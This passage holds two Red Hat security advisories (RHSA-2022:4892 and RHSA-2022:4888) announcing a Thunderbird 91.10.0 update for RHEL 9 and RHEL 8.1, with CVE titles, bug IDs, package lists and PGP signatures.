Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4892  
Issue date:        2022-06-03  
CVE Names:         CVE-2022-1834 CVE-2022-31736 CVE-2022-31737  
                   CVE-2022-31738 CVE-2022-31740 CVE-2022-31741  
                   CVE-2022-31742 CVE-2022-31747  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.10.0.

Security Fix(es):

* Mozilla: Braille space character caused incorrect sender email to be  
shown for a digitally signed email (CVE-2022-1834)

* Mozilla: Cross-Origin resource's length leaked (CVE-2022-31736)

* Mozilla: Heap buffer overflow in WebGL (CVE-2022-31737)

* Mozilla: Browser window spoof using fullscreen mode (CVE-2022-31738)

* Mozilla: Register allocation problem in WASM on arm64 (CVE-2022-31740)

* Mozilla: Uninitialized variable leads to invalid memory read  
(CVE-2022-31741)

* Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
(CVE-2022-31747)

* Mozilla: Querying a WebAuthn token with a large number of allowCredential  
entries may have leaked cross-origin information (CVE-2022-31742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2092018 - CVE-2022-31736 Mozilla: Cross-Origin resource's length leaked  
2092019 - CVE-2022-31737 Mozilla: Heap buffer overflow in WebGL  
2092021 - CVE-2022-31738 Mozilla: Browser window spoof using fullscreen mode  
2092023 - CVE-2022-31740 Mozilla: Register allocation problem in WASM on arm64  
2092024 - CVE-2022-31741 Mozilla: Uninitialized variable leads to invalid memory read  
2092025 - CVE-2022-31742 Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information  
2092026 - CVE-2022-31747 Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
2092416 - CVE-2022-1834 Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-91.10.0-1.el9_0.src.rpm

aarch64:  
thunderbird-91.10.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-91.10.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-91.10.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-91.10.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-91.10.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-91.10.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-91.10.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-91.10.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-91.10.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-91.10.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-91.10.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-91.10.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1834  
https://access.redhat.com/security/cve/CVE-2022-31736  
https://access.redhat.com/security/cve/CVE-2022-31737  
https://access.redhat.com/security/cve/CVE-2022-31738  
https://access.redhat.com/security/cve/CVE-2022-31740  
https://access.redhat.com/security/cve/CVE-2022-31741  
https://access.redhat.com/security/cve/CVE-2022-31742  
https://access.redhat.com/security/cve/CVE-2022-31747  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpp1i9zjgjWX9erEAQgSNg//VskL7k5NkhHOTEVvTXQZmIrhoPeYqG9Z  
35FcN1BzOC84SIM/ljKFMinJguU7Hu/LlxWIm1nCmJ8cmJ5RXOcsaFxMOygmgSAn  
ysW1X1QEOF6xjHHKI+YDeX6UlvkN3PViTIRAbDbvt05iCpoc1hjhDzRQeNJtAH4B  
f7JN2KPTy7ScMkDmfx1cZ7cZppr7lXNGIOOUN7zqgiwOcN+8iC3MIzRuOx9XlGEI  
t7VsCoQr/1dmbpzPCfNvH8idOgsvTA3oifDHPjOMqrNiSImYzJb4JRlpwfj1V9+y  
RtD03CQ7ZVybgYfNjgW/c4rsxQcXbZVmtSotGlse+aQHyGiVQGKAvCWoC2qN8y18  
KW1eE6FGyhSeDEjvjTWan+46Lmr8ZHktYQcMfvP4oGCxP8xCcZN5sRPBccI3GZLg  
Re3KS/0Q7JdYZqtZfxraNyUgW8S4dhqkdMWW+jBOHLdQ6J65aIXlHdiqfpI1T6Gd  
XPgWfdctSquxdUOUXfeVRuRILzzyqaoR4BmUGYTctXriiOzNhK1DJXnSxvODKZp3  
8DTqhdrf67Ip5+3ziZCgLndFNCBgxVBLjPk1GYh0t7nXFOqG6CEyXhuLXZuGV98/  
2Syh41QWEZDILx2bsxXslW/IUWhKFnFZ5ReKHr/pS5LyjgN9KIQac2NBSfotUmdo  
lFLOf7WRlcs<H8  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4892-01

Red Hat Security Advisory 2022-4888-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.10.0. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:4888-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4888  
Issue date:        2022-06-03  
CVE Names:         CVE-2022-1834 CVE-2022-31736 CVE-2022-31737  
                   CVE-2022-31738 CVE-2022-31740 CVE-2022-31741  
                   CVE-2022-31742 CVE-2022-31747  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.10.0.

Security Fix(es):

* Mozilla: Braille space character caused incorrect sender email to be  
shown for a digitally signed email (CVE-2022-1834)

* Mozilla: Cross-Origin resource's length leaked (CVE-2022-31736)

* Mozilla: Heap buffer overflow in WebGL (CVE-2022-31737)

* Mozilla: Browser window spoof using fullscreen mode (CVE-2022-31738)

* Mozilla: Register allocation problem in WASM on arm64 (CVE-2022-31740)

* Mozilla: Uninitialized variable leads to invalid memory read  
(CVE-2022-31741)

* Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
(CVE-2022-31747)

* Mozilla: Querying a WebAuthn token with a large number of allowCredential  
entries may have leaked cross-origin information (CVE-2022-31742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2092018 - CVE-2022-31736 Mozilla: Cross-Origin resource's length leaked  
2092019 - CVE-2022-31737 Mozilla: Heap buffer overflow in WebGL  
2092021 - CVE-2022-31738 Mozilla: Browser window spoof using fullscreen mode  
2092023 - CVE-2022-31740 Mozilla: Register allocation problem in WASM on arm64  
2092024 - CVE-2022-31741 Mozilla: Uninitialized variable leads to invalid memory read  
2092025 - CVE-2022-31742 Mozilla: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information  
2092026 - CVE-2022-31747 Mozilla: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10  
2092416 - CVE-2022-1834 Mozilla: Braille space character caused incorrect sender email to be shown for a digitally signed email

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-91.10.0-1.el8_1.src.rpm

ppc64le:  
thunderbird-91.10.0-1.el8_1.ppc64le.rpm  
thunderbird-debuginfo-91.10.0-1.el8_1.ppc64le.rpm  
thunderbird-debugsource-91.10.0-1.el8_1.ppc64le.rpm

x86_64:  
thunderbird-91.10.0-1.el8_1.x86_64.rpm  
thunderbird-debuginfo-91.10.0-1.el8_1.x86_64.rpm  
thunderbird-debugsource-91.10.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1834  
https://access.redhat.com/security/cve/CVE-2022-31736  
https://access.redhat.com/security/cve/CVE-2022-31737  
https://access.redhat.com/security/cve/CVE-2022-31738  
https://access.redhat.com/security/cve/CVE-2022-31740  
https://access.redhat.com/security/cve/CVE-2022-31741  
https://access.redhat.com/security/cve/CVE-2022-31742  
https://access.redhat.com/security/cve/CVE-2022-31747  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpp1d9zjgjWX9erEAQi1WRAAlmuH5Tpc9c/C+H4VtS9JMDGjZt22pXyC  
ERM+RzGA2iVG16T8dNsFaS+Kd2+o7GltePxhJVHakfH85mWNK+8QtHnwaiec8wCl  
SJE85aFD3M4USSQSkmi3r2eErsRTHTfIXDDk2oRN6vlXOtC8mwsTRGKvMluwLpjk  
ibCEJy3mzlhrBorAaeVJvSMRO+bdsheulGFuTnVHVBdzbCXitGvNzj6J5UxfKSqT  
5edHZp8FZR/ukiPfXpDDbtaBV81tqEqLGmv89qUiR6Es/d2IGNTK08KTCCxphQUG  
WBBio9hmbp8z0UoRAYNLStE9BCmIjFAnQ5/VqSsGNwX7N0cjs78UVZAc/yUK7qcQ  
hbXrzXyFP7YC/TxK+4X3CZF6jbER2LBpnPGBglIu/l3CpZUQFij6mx00Ajce/l/I  
bo9ZTzP+loP/71KvL4nysIpCjqmfz5ITAKlgrSozXCLmiPKMS2u9RP2miMFFv305  
9KCKArRd8opMLlxv8PQDyy+4OOjSihuQLJUVPVOVMKcx2OzK2ndLGrKrLMX/g1YU  
BqQK7gqMmrZbW7oRARGkmufDL8e0ct9uVMnp8CEUrHhnWZP4kyzpKz3UEQLC51XE  
gYBHAjc0AHLRNw5vAX/46KJZveNGsf/RPabRCsbuqynx2TB3WGZxYm7A3nu1ojPk  
bBTPTPG9qG8=nNce  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox